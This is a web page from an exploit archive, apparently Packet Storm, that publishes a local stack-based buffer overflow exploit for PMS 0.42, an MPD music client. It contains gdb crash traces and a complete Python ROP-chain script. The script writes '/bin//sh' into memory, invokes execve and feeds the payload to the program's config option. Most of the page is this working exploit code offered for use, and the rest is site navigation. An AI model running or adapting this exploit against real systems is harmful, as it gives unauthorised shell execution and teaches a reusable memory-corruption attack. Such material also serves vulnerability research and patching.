Twenty Year Anniversary

PMS 0.42 Stack-Based Buffer Overflow

PMS 0.42 Stack-Based Buffer Overflow
Posted Apr 4, 2018
Authored by Juan Sacco

PMS version 0.42 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
MD5 | 040caf5340322857b30d22ea4686e161

PMS 0.42 Stack-Based Buffer Overflow

Change Mirror Download
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
# Vulnerability found using Exploit Pack v10 - Fuzzer local module
#
# Tested on: Kali i686 GNU/Linux
#
# Description: PMS 0.42 is prone to a local unauthenticated stack-based overflow
# The vulnerability is due to an unproper filter of user supplied
input while reading
# the configuration file and parsing the malicious crafted values.
#
# 0004| 0xbfffe6c4 --> 0x445b91 (": could not open file.\n")
# 0008| 0xbfffe6c8 --> 0xbfffe720 ("Didn't find configuration file ",
'A' <repeats 169 times>...)
# 0012| 0xbfffe6cc --> 0xbfffe6f8 --> 0x736e6f00 ('')
#
# Program: PMS 0.42 Practical Music Search, an MPD client
# PMS is an ncurses based client for Music Player Daemon.
# Vendor homepage: https://pms.sourceforge.net
# Kali Filename: pool/main/p/pms/pms_0.42-1+b2_i386.deb
#
# CANARY : disabled
# FORTIFY : disabled
# NX : ENABLED
# PIE : disabled
# RELRO : Partial
#
#0000| 0xbfffe6c0 --> 0x4592a0 --> 0x45f870 --> 0x4
#0004| 0xbfffe6c4 --> 0x445b91 (": could not open file.\n")
#0008| 0xbfffe6c8 --> 0xbfffe720 ("Didn't find configuration file ",
'A' <repeats 169 times>...)
#0012| 0xbfffe6cc --> 0xbfffe6f8 --> 0x736e6f00 ('')
#0016| 0xbfffe6d0 --> 0x4637ef ("german")
#0020| 0xbfffe6d4 --> 0x4637f6 ("de_DE.ISO-8859-1")
#0024| 0xbfffe6d8 --> 0x46adb0 ("AAAA\240\312F")
#0028| 0xbfffe6dc ("2018-04-04 06:57:58")
#Legend: code, data, rodata, value
#Stopped reason: SIGSEGV
#0x0042f6c6 in Pms::log (this=<optimized out>, verbosity=<optimized
out>, code=0x41414141, format=<optimized out>) at src/pms.cpp:982
#982 if (!disp && verbosity < MSG_DEBUG)
#gdb-peda$ backtrace
#0 0x0042f6c6 in Pms::log (this=<optimized out>, verbosity=<optimized
out>, code=0x41414141, format=<optimized out>) at src/pms.cpp:982
#1 0x41414141 in ?? ()

import os, subprocess
from struct import pack

# rop execve
rop = "A"*1017 # junk
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi
; pop ebp ; ret
rop += pack('<I', 0x0811abe0) # @ .data
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x0807b744) # pop eax ; ret
rop += '/bin'
rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;
pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; popedi ;
pop ebp ; ret
rop += pack('<I', 0x0811abe4) # @ .data + 4
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x0807b744) # pop eax ; ret
rop += '//sh'
rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;
pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi
; pop ebp ; ret
rop += pack('<I', 0x0811abe8) # @ .data + 8
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;
pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080dcf4b) # pop ebx ; pop esi ; pop edi ; ret
rop += pack('<I', 0x0811abe0) # @ .data
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x08067b43) # pop ecx ; ret
rop += pack('<I', 0x0811abe8) # @ .data + 8
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi
; pop ebp ; ret
rop += pack('<I', 0x0811abe8) # @ .data + 8
rop += pack('<I', 0x0811abe0) # padding without overwrite ebx
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080c861f) # int 0x80

try:
print("[*] PMS 0.42 Buffer Overflow by Juan Sacco")
print("[*] Please wait.. running")
subprocess.call(["pms -c", rop])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "PMS not found!"
else:
print "Error executing exploit"
raise

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    15 Files
  • 11
    Dec 11th
    30 Files
  • 12
    Dec 12th
    25 Files
  • 13
    Dec 13th
    15 Files
  • 14
    Dec 14th
    14 Files
  • 15
    Dec 15th
    2 Files
  • 16
    Dec 16th
    3 Files
  • 17
    Dec 17th
    15 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close